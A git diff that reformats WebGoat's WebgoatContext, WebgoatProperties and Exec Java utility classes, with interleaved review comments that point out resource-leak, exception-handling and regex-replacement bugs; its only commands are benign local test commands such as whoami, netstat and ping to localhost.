diff --git a/main/project/JavaSource/org/owasp/webgoat/session/WebgoatContext.java b/main/project/JavaSource/org/owasp/webgoat/session/WebgoatContext.java index f2a79223a..5a8f29fa6 100755 --- a/main/project/JavaSource/org/owasp/webgoat/session/WebgoatContext.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/WebgoatContext.java @@ -1,10 +1,12 @@ + package org.owasp.webgoat.session; import java.util.Iterator; - import javax.servlet.http.HttpServlet; -public class WebgoatContext { + +public class WebgoatContext +{ public final static String DATABASE_CONNECTION_STRING = "DatabaseConnectionString"; @@ -17,7 +19,7 @@ public class WebgoatContext { public final static String ENTERPRISE = "Enterprise"; public final static String CODING_EXERCISES = "CodingExercises"; - + public final static String SHOWCOOKIES = "ShowCookies"; public final static String SHOWPARAMS = "ShowParams"; @@ -25,9 +27,9 @@ public class WebgoatContext { public final static String SHOWREQUEST = "ShowRequest"; public final static String SHOWSOURCE = "ShowSource"; - + public final static String SHOWSOLUTION = "ShowSolution"; - + public final static String SHOWHINTS = "ShowHints"; public final static String DEFUSEOSCOMMANDS = "DefuseOSCommands"; @@ -61,7 +63,7 @@ public class WebgoatContext { private boolean enterprise = false; private boolean codingExercises = false; - + private String feedbackAddress = "webgoat@owasp.org"; private boolean isDebug = false; 
@@ -70,57 +72,56 @@ public class WebgoatContext { private HttpServlet servlet; - public WebgoatContext(HttpServlet servlet) { + public WebgoatContext(HttpServlet servlet) + { this.servlet = servlet; databaseConnectionString = getParameter(servlet, DATABASE_CONNECTION_STRING); databaseDriver = getParameter(servlet, DATABASE_DRIVER); databaseUser = getParameter(servlet, DATABASE_USER); databasePassword = getParameter(servlet, DATABASE_PASSWORD); - + // initialize from web.xml - showParams = "true".equals( getParameter(servlet, SHOWPARAMS ) ); - showCookies = "true".equals( getParameter(servlet, SHOWCOOKIES ) ); - showSource = "true".equals( getParameter(servlet, SHOWSOURCE ) ); - showSolution = "true".equals( getParameter( servlet, SHOWSOLUTION ) ); - defuseOSCommands = "true".equals( getParameter(servlet, DEFUSEOSCOMMANDS ) ); - enterprise = "true".equals( getParameter(servlet, ENTERPRISE ) ); - codingExercises = "true".equals( getParameter(servlet, CODING_EXERCISES ) ); - feedbackAddress = getParameter(servlet, FEEDBACK_ADDRESS ) != null ? - getParameter(servlet, FEEDBACK_ADDRESS ) : feedbackAddress; - showRequest = "true".equals( getParameter(servlet, SHOWREQUEST ) ); - isDebug = "true".equals( getParameter(servlet, DEBUG ) ); + showParams = "true".equals(getParameter(servlet, SHOWPARAMS)); + showCookies = "true".equals(getParameter(servlet, SHOWCOOKIES)); + showSource = "true".equals(getParameter(servlet, SHOWSOURCE)); + showSolution = "true".equals(getParameter(servlet, SHOWSOLUTION)); + defuseOSCommands = "true".equals(getParameter(servlet, DEFUSEOSCOMMANDS)); + enterprise = "true".equals(getParameter(servlet, ENTERPRISE)); + codingExercises = "true".equals(getParameter(servlet, CODING_EXERCISES)); + feedbackAddress = getParameter(servlet, FEEDBACK_ADDRESS) != null ? 
getParameter(servlet, FEEDBACK_ADDRESS) + : feedbackAddress; + showRequest = "true".equals(getParameter(servlet, SHOWREQUEST)); + isDebug = "true".equals(getParameter(servlet, DEBUG)); servletName = servlet.getServletName(); - + } - private String getParameter(HttpServlet servlet, String key) { + private String getParameter(HttpServlet servlet, String key) + { String value = System.getenv().get(key); - if (value == null) - value = servlet.getInitParameter(key); + if (value == null) value = servlet.getInitParameter(key); return value; } - + /** - * returns the connection string with the real path to the database - * directory inserted at the word PATH + * returns the connection string with the real path to the database directory inserted at the + * word PATH * * @return The databaseConnectionString value */ - public String getDatabaseConnectionString() { - if (realConnectionString == null) - try { - String path = servlet.getServletContext().getRealPath( - "/database").replace('\\', '/'); - System.out.println("PATH: " + path); - realConnectionString = databaseConnectionString.replaceAll( - "PATH", path); - System.out.println("Database Connection String: " - + realConnectionString); - } catch (Exception e) { - System.out - .println("Couldn't open database: check web.xml database parameters"); - e.printStackTrace(); - } + public String getDatabaseConnectionString() + { + if (realConnectionString == null) try + { + String path = servlet.getServletContext().getRealPath("/database").replace('\\', '/'); + System.out.println("PATH: " + path); + realConnectionString = databaseConnectionString.replaceAll("PATH", path); + System.out.println("Database Connection String: " + realConnectionString); + } catch (Exception e) + { + System.out.println("Couldn't open database: check web.xml database parameters"); + e.printStackTrace(); + } return realConnectionString; } 
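Review bot: In getDatabaseConnectionString, `realConnectionString = databaseConnectionString.replaceAll("PATH", path);` treats `path` as a regex replacement string, so a real path containing `$` (or a backslash the earlier `replace('\\', '/')` did not remove) either throws IllegalArgumentException or substitutes group references; `databaseConnectionString.replace("PATH", path)` performs the literal substitution intended. The reformat also left `if (realConnectionString == null) try { … }` on one line with no braces on the `if`, which reads like a typo and should be braced. On failure `realConnectionString` stays null, so the lookup and stack trace repeat on every call; that is pre-existing but worth a comment such as `// null result means initialization failed; retried on next call`.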
@@ -129,7 +130,8 @@ public class WebgoatContext { * * @return The databaseDriver value */ - public String getDatabaseDriver() { + public String getDatabaseDriver() + { return (databaseDriver); } @@ -138,7 +140,8 @@ public class WebgoatContext { * * @return The databaseUser value */ - public String getDatabaseUser() { + public String getDatabaseUser() + { return (databaseUser); } @@ -147,51 +150,63 @@ public class WebgoatContext { * * @return The databasePassword value */ - public String getDatabasePassword() { + public String getDatabasePassword() + { return (databasePassword); } - public boolean isDefuseOSCommands() { + public boolean isDefuseOSCommands() + { return defuseOSCommands; } - public boolean isEnterprise() { + public boolean isEnterprise() + { return enterprise; } - public boolean isCodingExercises() { + public boolean isCodingExercises() + { return codingExercises; } - - public String getFeedbackAddress() { + + public String getFeedbackAddress() + { return feedbackAddress; } - public boolean isDebug() { + public boolean isDebug() + { return isDebug; } - public String getServletName() { + public String getServletName() + { return servletName; } - public boolean isShowCookies() { + public boolean isShowCookies() + { return showCookies; } - public boolean isShowParams() { + public boolean isShowParams() + { return showParams; } - public boolean isShowRequest() { + public boolean isShowRequest() + { return showRequest; } - public boolean isShowSource() { + public boolean isShowSource() + { return showSource; } - public boolean isShowSolution() { + public boolean isShowSolution() + { return showSolution; } diff --git a/main/project/JavaSource/org/owasp/webgoat/session/WebgoatProperties.java b/main/project/JavaSource/org/owasp/webgoat/session/WebgoatProperties.java index e9501ad61..553d54745 100644 --- a/main/project/JavaSource/org/owasp/webgoat/session/WebgoatProperties.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/WebgoatProperties.java 
@@ -1,133 +1,123 @@ + package org.owasp.webgoat.session; import java.io.FileInputStream; import java.io.IOException; import java.util.Properties; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class WebgoatProperties extends Properties { - /** + /** * */ private static final long serialVersionUID = 4351681705558227918L; - public WebgoatProperties(String propertiesFileName) throws IOException - { - try { - FileInputStream in = new FileInputStream(propertiesFileName); - load(in); - } - catch (IOException e) - { - System.out - .println("Warning: Unable to open webgoat.properties file"); - } - } - - - public int getIntProperty(String key, int defaultValue) - { - int value = defaultValue; - - String s = getProperty(key); - if (s != null) - { - value = Integer.parseInt(s); + try + { + FileInputStream in = new FileInputStream(propertiesFileName); + load(in); + } catch (IOException e) + { + System.out.println("Warning: Unable to open webgoat.properties file"); + } } - return value; - } - - - public boolean getBooleanProperty(String key, boolean defaultValue) - { - boolean value = defaultValue; - key = this.trimLesson(key); - - String s = getProperty(key); - if (s != null) + public int getIntProperty(String key, int defaultValue) { - if (s.equalsIgnoreCase("true")) - value = true; - else if (s.equalsIgnoreCase("yes")) - value = true; - else if (s.equalsIgnoreCase("on")) - value = true; - else if (s.equalsIgnoreCase("false")) - value = false; - else if (s.equalsIgnoreCase("no")) - value = false; - else if (s.equalsIgnoreCase("off")) - value = false; + int value = defaultValue; + + String s = getProperty(key); + if (s != null) + { + 
value = Integer.parseInt(s); + } + + return value; } - return value; - } - - - private String trimLesson(String lesson) - { - String result = ""; - - if (lesson.startsWith("org.owasp.webgoat.lessons.")) + public boolean getBooleanProperty(String key, boolean defaultValue) { - result = lesson.substring("org.owasp.webgoat.lessons.".length(), - lesson.length()); - } - else - { - result = lesson; + boolean value = defaultValue; + key = this.trimLesson(key); + + String s = getProperty(key); + if (s != null) + { + if (s.equalsIgnoreCase("true")) + value = true; + else if (s.equalsIgnoreCase("yes")) + value = true; + else if (s.equalsIgnoreCase("on")) + value = true; + else if (s.equalsIgnoreCase("false")) + value = false; + else if (s.equalsIgnoreCase("no")) + value = false; + else if (s.equalsIgnoreCase("off")) value = false; + } + + return value; } - return result; - } - - - public static void main(String[] args) - { - WebgoatProperties properties = null; - try + private String trimLesson(String lesson) { - properties = new WebgoatProperties("C:\\webgoat.properties"); + String result = ""; + + if (lesson.startsWith("org.owasp.webgoat.lessons.")) + { + result = lesson.substring("org.owasp.webgoat.lessons.".length(), lesson.length()); + } + else + { + result = lesson; + } + + return result; } - catch (IOException e) + + public static void main(String[] args) { - System.out.println("Error loading properties"); - e.printStackTrace(); + WebgoatProperties properties = null; + try + { + properties = new WebgoatProperties("C:\\webgoat.properties"); + } catch (IOException e) + { + System.out.println("Error loading properties"); + e.printStackTrace(); + } + System.out.println(properties.getProperty("CommandInjection.category")); } - System.out.println(properties.getProperty("CommandInjection.category")); - } } diff --git a/main/project/JavaSource/org/owasp/webgoat/util/Exec.java b/main/project/JavaSource/org/owasp/webgoat/util/Exec.java index ea061dc35..5105d7213 100644 
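Review bot: The `WebgoatProperties` constructor opens `new FileInputStream(propertiesFileName)` and never closes it, so each construction leaks a file descriptor; `try (FileInputStream in = new FileInputStream(propertiesFileName)) { load(in); }` releases it on every path. The `catch (IOException e)` then swallows the failure with a println even though the signature still declares `throws IOException`, so callers — including the `catch` in `main` below — handle an exception that is never thrown and silently receive an empty property set; either rethrow or drop the `throws`. `getIntProperty` hands any non-numeric value straight to `Integer.parseInt`, so a malformed entry surfaces as an uncaught `NumberFormatException` rather than the `defaultValue` the signature suggests.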
--- a/main/project/JavaSource/org/owasp/webgoat/util/Exec.java +++ b/main/project/JavaSource/org/owasp/webgoat/util/Exec.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.util; import java.io.ByteArrayOutputStream; 
@@ -6,537 +7,520 @@ import java.io.InputStream; import java.io.OutputStream; import java.util.BitSet; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Jeff Williams Aspect Security - * @created October 28, 2003 + * + * @author Jeff Williams Aspect Security + * @created October 28, 2003 */ public class Exec { - /** - * Description of the Method - * - * @param command Description of the Parameter - * @param input Description of the Parameter - * @return Description of the Return Value - */ - public static ExecResults execInput(String command, String input) - { - return (execOptions(command, input, 0, 0, false)); - } - - - /** - * Description of the Method - * - * @param command Description of the Parameter - * @return Description of the Return Value - */ - public static ExecResults execLazy(String command) - { - return (execOptions(command, "", 0, 0, true)); - } - - - /* - * Execute an OS command and capture the output in an ExecResults. - * All exceptions are caught and stored in the ExecResults. 
- * @param String command is the OS command to execute - * @param String input is piped into the OS command - * @param int successCode is the expected return code if the command completes successfully - * @param int timeout is the number of milliseconds to wait before interrupting the command - * @param boolean quit tells the method to exit when there is no more output waiting - */ - /** - * Description of the Method - * - * @param command Description of the Parameter - * @param input Description of the Parameter - * @param successCode Description of the Parameter - * @param timeout Description of the Parameter - * @param lazy Description of the Parameter - * @return Description of the Return Value - */ - public static ExecResults execOptions(String[] command, String input, - int successCode, int timeout, boolean lazy) - { - Process child = null; - ByteArrayOutputStream output = new ByteArrayOutputStream(); - ByteArrayOutputStream errors = new ByteArrayOutputStream(); - ExecResults results = new ExecResults(command[0], input, successCode, - timeout); - BitSet interrupted = new BitSet(1); - boolean lazyQuit = false; - ThreadWatcher watcher; - - try + /** + * Description of the Method + * + * @param command + * Description of the Parameter + * @param input + * Description of the Parameter + * @return Description of the Return Value + */ + public static ExecResults execInput(String command, String input) { - // start the command - child = Runtime.getRuntime().exec(command); + return (execOptions(command, input, 0, 0, false)); + } - // get the streams in and out of the command - InputStream processIn = child.getInputStream(); - InputStream processError = child.getErrorStream(); - OutputStream processOut = child.getOutputStream(); + /** + * Description of the Method + * + * @param command + * Description of the Parameter + * @return Description of the Return Value + */ + public static ExecResults execLazy(String command) + { + return (execOptions(command, "", 0, 0, 
true)); + } - // start the clock running - if (timeout > 0) - { - watcher = new ThreadWatcher(child, interrupted, timeout); - new Thread(watcher).start(); - } + /* + * Execute an OS command and capture the output in an ExecResults. All exceptions are caught and + * stored in the ExecResults. @param String command is the OS command to execute @param String + * input is piped into the OS command @param int successCode is the expected return code if the + * command completes successfully @param int timeout is the number of milliseconds to wait + * before interrupting the command @param boolean quit tells the method to exit when there is no + * more output waiting + */ + /** + * Description of the Method + * + * @param command + * Description of the Parameter + * @param input + * Description of the Parameter + * @param successCode + * Description of the Parameter + * @param timeout + * Description of the Parameter + * @param lazy + * Description of the Parameter + * @return Description of the Return Value + */ + public static ExecResults execOptions(String[] command, String input, int successCode, int timeout, boolean lazy) + { + Process child = null; + ByteArrayOutputStream output = new ByteArrayOutputStream(); + ByteArrayOutputStream errors = new ByteArrayOutputStream(); + ExecResults results = new ExecResults(command[0], input, successCode, timeout); + BitSet interrupted = new BitSet(1); + boolean lazyQuit = false; + ThreadWatcher watcher; - // Write to the child process' input stream - if ((input != null) && !input.equals("")) - { try { - processOut.write(input.getBytes()); - processOut.flush(); - processOut.close(); - } - catch (IOException e1) + // start the command + child = Runtime.getRuntime().exec(command); + + // get the streams in and out of the command + InputStream processIn = child.getInputStream(); + InputStream processError = child.getErrorStream(); + OutputStream processOut = child.getOutputStream(); + + // start the clock running + if (timeout > 0) + 
{ + watcher = new ThreadWatcher(child, interrupted, timeout); + new Thread(watcher).start(); + } + + // Write to the child process' input stream + if ((input != null) && !input.equals("")) + { + try + { + processOut.write(input.getBytes()); + processOut.flush(); + processOut.close(); + } catch (IOException e1) + { + results.setThrowable(e1); + } + } + + // Read from the child process' output stream + // The process may get killed by the watcher at any time + int c = 0; + + try + { + while (true) + { + if (interrupted.get(0) || lazyQuit) + { + break; + } + + // interrupted + c = processIn.read(); + + if (c == -1) + { + break; + } + + // end of stream + output.write(c); + + if (lazy && (processIn.available() < 1)) + { + lazyQuit = true; + } + + // if lazy and nothing then quit (after at least one read) + } + + processIn.close(); + } catch (IOException e2) + { + results.setThrowable(e2); + } finally + { + if (interrupted.get(0)) + { + results.setInterrupted(); + } + + results.setOutput(output.toString()); + } + + // Read from the child process' error stream + // The process may get killed by the watcher at any time + try + { + while (true) + { + if (interrupted.get(0) || lazyQuit) + { + break; + } + + // interrupted + c = processError.read(); + + if (c == -1) + { + break; + } + + // end of stream + output.write(c); + + if (lazy && (processError.available() < 1)) + { + lazyQuit = true; + } + + // if lazy and nothing then quit (after at least one read) + } + + processError.close(); + } catch (IOException e3) + { + results.setThrowable(e3); + } finally + { + if (interrupted.get(0)) + { + results.setInterrupted(); + } + + results.setErrors(errors.toString()); + } + + // wait for the return value of the child process. 
+ if (!interrupted.get(0) && !lazyQuit) + { + int returnCode = child.waitFor(); + results.setReturnCode(returnCode); + + if (returnCode != successCode) + { + results.setError(ExecResults.BADRETURNCODE); + } + } + } catch (InterruptedException i) { - results.setThrowable(e1); - } - } - - // Read from the child process' output stream - // The process may get killed by the watcher at any time - int c = 0; - - try - { - while (true) + results.setInterrupted(); + } catch (Throwable t) { - if (interrupted.get(0) || lazyQuit) - { - break; - } - - // interrupted - c = processIn.read(); - - if (c == -1) - { - break; - } - - // end of stream - output.write(c); - - if (lazy && (processIn.available() < 1)) - { - lazyQuit = true; - } - - // if lazy and nothing then quit (after at least one read) - } - - processIn.close(); - } - catch (IOException e2) - { - results.setThrowable(e2); - } - finally - { - if (interrupted.get(0)) + results.setThrowable(t); + } finally { - results.setInterrupted(); + if (child != null) + { + child.destroy(); + } } - results.setOutput(output.toString()); - } - - // Read from the child process' error stream - // The process may get killed by the watcher at any time - try - { - while (true) - { - if (interrupted.get(0) || lazyQuit) - { - break; - } - - // interrupted - c = processError.read(); - - if (c == -1) - { - break; - } - - // end of stream - output.write(c); - - if (lazy && (processError.available() < 1)) - { - lazyQuit = true; - } - - // if lazy and nothing then quit (after at least one read) - } - - processError.close(); - } - catch (IOException e3) - { - results.setThrowable(e3); - } - finally - { - if (interrupted.get(0)) - { - results.setInterrupted(); - } - - results.setErrors(errors.toString()); - } - - // wait for the return value of the child process. 
- if (!interrupted.get(0) && !lazyQuit) - { - int returnCode = child.waitFor(); - results.setReturnCode(returnCode); - - if (returnCode != successCode) - { - results.setError(ExecResults.BADRETURNCODE); - } - } - } - catch (InterruptedException i) - { - results.setInterrupted(); - } - catch (Throwable t) - { - results.setThrowable(t); - } - finally - { - if (child != null) - { - child.destroy(); - } + return (results); } - return (results); - } - - - /* - * Execute an OS command and capture the output in an ExecResults. - * All exceptions are caught and stored in the ExecResults. - * @param String command is the OS command to execute - * @param String input is piped into the OS command - * @param int successCode is the expected return code if the command completes successfully - * @param int timeout is the number of milliseconds to wait before interrupting the command - * @param boolean quit tells the method to exit when there is no more output waiting - */ - /** - * Description of the Method - * - * @param command Description of the Parameter - * @param input Description of the Parameter - * @param successCode Description of the Parameter - * @param timeout Description of the Parameter - * @param lazy Description of the Parameter - * @return Description of the Return Value - */ - public static ExecResults execOptions(String command, String input, - int successCode, int timeout, boolean lazy) - { - Process child = null; - ByteArrayOutputStream output = new ByteArrayOutputStream(); - ByteArrayOutputStream errors = new ByteArrayOutputStream(); - ExecResults results = new ExecResults(command, input, successCode, - timeout); - BitSet interrupted = new BitSet(1); - boolean lazyQuit = false; - ThreadWatcher watcher; - - try + /* + * Execute an OS command and capture the output in an ExecResults. All exceptions are caught and + * stored in the ExecResults. 
@param String command is the OS command to execute @param String + * input is piped into the OS command @param int successCode is the expected return code if the + * command completes successfully @param int timeout is the number of milliseconds to wait + * before interrupting the command @param boolean quit tells the method to exit when there is no + * more output waiting + */ + /** + * Description of the Method + * + * @param command + * Description of the Parameter + * @param input + * Description of the Parameter + * @param successCode + * Description of the Parameter + * @param timeout + * Description of the Parameter + * @param lazy + * Description of the Parameter + * @return Description of the Return Value + */ + public static ExecResults execOptions(String command, String input, int successCode, int timeout, boolean lazy) { - // start the command - child = Runtime.getRuntime().exec(command); + Process child = null; + ByteArrayOutputStream output = new ByteArrayOutputStream(); + ByteArrayOutputStream errors = new ByteArrayOutputStream(); + ExecResults results = new ExecResults(command, input, successCode, timeout); + BitSet interrupted = new BitSet(1); + boolean lazyQuit = false; + ThreadWatcher watcher; - // get the streams in and out of the command - InputStream processIn = child.getInputStream(); - InputStream processError = child.getErrorStream(); - OutputStream processOut = child.getOutputStream(); - - // start the clock running - if (timeout > 0) - { - watcher = new ThreadWatcher(child, interrupted, timeout); - new Thread(watcher).start(); - } - - // Write to the child process' input stream - if ((input != null) && !input.equals("")) - { try { - processOut.write(input.getBytes()); - processOut.flush(); - processOut.close(); - } - catch (IOException e1) + // start the command + child = Runtime.getRuntime().exec(command); + + // get the streams in and out of the command + InputStream processIn = child.getInputStream(); + InputStream processError = 
child.getErrorStream(); + OutputStream processOut = child.getOutputStream(); + + // start the clock running + if (timeout > 0) + { + watcher = new ThreadWatcher(child, interrupted, timeout); + new Thread(watcher).start(); + } + + // Write to the child process' input stream + if ((input != null) && !input.equals("")) + { + try + { + processOut.write(input.getBytes()); + processOut.flush(); + processOut.close(); + } catch (IOException e1) + { + results.setThrowable(e1); + } + } + + // Read from the child process' output stream + // The process may get killed by the watcher at any time + int c = 0; + + try + { + while (true) + { + if (interrupted.get(0) || lazyQuit) + { + break; + } + + // interrupted + c = processIn.read(); + + if (c == -1) + { + break; + } + + // end of stream + output.write(c); + + if (lazy && (processIn.available() < 1)) + { + lazyQuit = true; + } + + // if lazy and nothing then quit (after at least one read) + } + + processIn.close(); + } catch (IOException e2) + { + results.setThrowable(e2); + } finally + { + if (interrupted.get(0)) + { + results.setInterrupted(); + } + + results.setOutput(output.toString()); + } + + // Read from the child process' error stream + // The process may get killed by the watcher at any time + try + { + while (true) + { + if (interrupted.get(0) || lazyQuit) + { + break; + } + + // interrupted + c = processError.read(); + + if (c == -1) + { + break; + } + + // end of stream + output.write(c); + + if (lazy && (processError.available() < 1)) + { + lazyQuit = true; + } + + // if lazy and nothing then quit (after at least one read) + } + + processError.close(); + } catch (IOException e3) + { + results.setThrowable(e3); + } finally + { + if (interrupted.get(0)) + { + results.setInterrupted(); + } + + results.setErrors(errors.toString()); + } + + // wait for the return value of the child process. 
+ if (!interrupted.get(0) && !lazyQuit) + { + int returnCode = child.waitFor(); + results.setReturnCode(returnCode); + + if (returnCode != successCode) + { + results.setError(ExecResults.BADRETURNCODE); + } + } + } catch (InterruptedException i) { - results.setThrowable(e1); - } - } - - // Read from the child process' output stream - // The process may get killed by the watcher at any time - int c = 0; - - try - { - while (true) + results.setInterrupted(); + } catch (Throwable t) { - if (interrupted.get(0) || lazyQuit) - { - break; - } - - // interrupted - c = processIn.read(); - - if (c == -1) - { - break; - } - - // end of stream - output.write(c); - - if (lazy && (processIn.available() < 1)) - { - lazyQuit = true; - } - - // if lazy and nothing then quit (after at least one read) - } - - processIn.close(); - } - catch (IOException e2) - { - results.setThrowable(e2); - } - finally - { - if (interrupted.get(0)) + results.setThrowable(t); + } finally { - results.setInterrupted(); + if (child != null) + { + child.destroy(); + } } - results.setOutput(output.toString()); - } - - // Read from the child process' error stream - // The process may get killed by the watcher at any time - try - { - while (true) - { - if (interrupted.get(0) || lazyQuit) - { - break; - } - - // interrupted - c = processError.read(); - - if (c == -1) - { - break; - } - - // end of stream - output.write(c); - - if (lazy && (processError.available() < 1)) - { - lazyQuit = true; - } - - // if lazy and nothing then quit (after at least one read) - } - - processError.close(); - } - catch (IOException e3) - { - results.setThrowable(e3); - } - finally - { - if (interrupted.get(0)) - { - results.setInterrupted(); - } - - results.setErrors(errors.toString()); - } - - // wait for the return value of the child process. 
- if (!interrupted.get(0) && !lazyQuit) - { - int returnCode = child.waitFor(); - results.setReturnCode(returnCode); - - if (returnCode != successCode) - { - results.setError(ExecResults.BADRETURNCODE); - } - } + return (results); } - catch (InterruptedException i) + + /** + * Description of the Method + * + * @param command + * Description of the Parameter + * @return Description of the Return Value + */ + public static ExecResults execSimple(String[] command) { - results.setInterrupted(); + return (execOptions(command, "", 0, 0, false)); } - catch (Throwable t) + + /** + * Description of the Method + * + * @param command + * Description of the Parameter + * @return Description of the Return Value + */ + public static ExecResults execSimple(String command) { - results.setThrowable(t); + return (execOptions(command, "", 0, 0, false)); } - finally + + /** + * Description of the Method + * + * @param command + * Description of the Parameter + * @param args + * Description of the Parameter + * @return Description of the Return Value + */ + public static ExecResults execSimple(String command, String args) { - if (child != null) - { - child.destroy(); - } + return (execOptions(command, args, 0, 0, false)); } - return (results); - } - - - /** - * Description of the Method - * - * @param command Description of the Parameter - * @return Description of the Return Value - */ - public static ExecResults execSimple(String[] command) - { - return (execOptions(command, "", 0, 0, false)); - } - - - /** - * Description of the Method - * - * @param command Description of the Parameter - * @return Description of the Return Value - */ - public static ExecResults execSimple(String command) - { - return (execOptions(command, "", 0, 0, false)); - } - - - /** - * Description of the Method - * - * @param command Description of the Parameter - * @param args Description of the Parameter - * @return Description of the Return Value - */ - public static ExecResults execSimple(String command, 
String args) - { - return (execOptions(command, args, 0, 0, false)); - } - - - /** - * Description of the Method - * - * @param command Description of the Parameter - * @param timeout Description of the Parameter - * @return Description of the Return Value - */ - public static ExecResults execTimeout(String command, int timeout) - { - return (execOptions(command, "", 0, timeout, false)); - } - - - /** - * The main program for the Exec class - * - * @param args The command line arguments - */ - public static void main(String[] args) - { - ExecResults results; - String sep = System.getProperty("line.separator"); - System.out.println("-------------------------------------------" + sep - + "TEST 1: execSimple"); - results = Exec.execSimple("c:/swarm-2.1.1/bin/whoami.exe"); - System.out.println(results); - System.out.println("-------------------------------------------" + sep - + "TEST 2: execSimple (with search)"); - results = Exec.execSimple("netstat -r"); - System.out.println(results); - - if (results.outputContains("localhost:1031")) + /** + * Description of the Method + * + * @param command + * Description of the Parameter + * @param timeout + * Description of the Parameter + * @return Description of the Return Value + */ + public static ExecResults execTimeout(String command, int timeout) { - System.out.println("ERROR: listening on 1031"); + return (execOptions(command, "", 0, timeout, false)); } - System.out.println("-------------------------------------------" + sep - + "TEST 3: execInput"); - results = Exec.execInput("find \"cde\"", - "abcdefg1\nhijklmnop\nqrstuv\nabcdefg2"); - System.out.println(results); - System.out.println("-------------------------------------------" + sep - + "TEST 4:execTimeout"); - results = Exec.execTimeout("ping -t 127.0.0.1", 5 * 1000); - System.out.println(results); - System.out.println("-------------------------------------------" + sep - + "TEST 5:execLazy"); - results = Exec.execLazy("ping -t 127.0.0.1"); - 
System.out.println(results); - System.out.println("-------------------------------------------" + sep - + "TEST 6:ExecTimeout process never outputs"); - results = Exec.execTimeout("c:/swarm-2.1.1/bin/sleep.exe 20", 5 * 1000); - System.out.println(results); - System.out.println("-------------------------------------------" + sep - + "TEST 7:ExecTimeout process waits for input"); - results = Exec.execTimeout("c:/swarm-2.1.1/bin/cat", 5 * 1000); - System.out.println(results); - } + /** + * The main program for the Exec class + * + * @param args + * The command line arguments + */ + public static void main(String[] args) + { + ExecResults results; + String sep = System.getProperty("line.separator"); + System.out.println("-------------------------------------------" + sep + "TEST 1: execSimple"); + results = Exec.execSimple("c:/swarm-2.1.1/bin/whoami.exe"); + System.out.println(results); + System.out.println("-------------------------------------------" + sep + "TEST 2: execSimple (with search)"); + results = Exec.execSimple("netstat -r"); + System.out.println(results); + + if (results.outputContains("localhost:1031")) + { + System.out.println("ERROR: listening on 1031"); + } + + System.out.println("-------------------------------------------" + sep + "TEST 3: execInput"); + results = Exec.execInput("find \"cde\"", "abcdefg1\nhijklmnop\nqrstuv\nabcdefg2"); + System.out.println(results); + System.out.println("-------------------------------------------" + sep + "TEST 4:execTimeout"); + results = Exec.execTimeout("ping -t 127.0.0.1", 5 * 1000); + System.out.println(results); + System.out.println("-------------------------------------------" + sep + "TEST 5:execLazy"); + results = Exec.execLazy("ping -t 127.0.0.1"); + System.out.println(results); + System.out.println("-------------------------------------------" + sep + + "TEST 6:ExecTimeout process never outputs"); + results = Exec.execTimeout("c:/swarm-2.1.1/bin/sleep.exe 20", 5 * 1000); + System.out.println(results); + 
System.out.println("-------------------------------------------" + sep + + "TEST 7:ExecTimeout process waits for input"); + results = Exec.execTimeout("c:/swarm-2.1.1/bin/cat", 5 * 1000); + System.out.println(results); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/util/ExecResults.java b/main/project/JavaSource/org/owasp/webgoat/util/ExecResults.java index b3dd1c5de..7cd0d6713 100644 --- a/main/project/JavaSource/org/owasp/webgoat/util/ExecResults.java +++ b/main/project/JavaSource/org/owasp/webgoat/util/ExecResults.java 
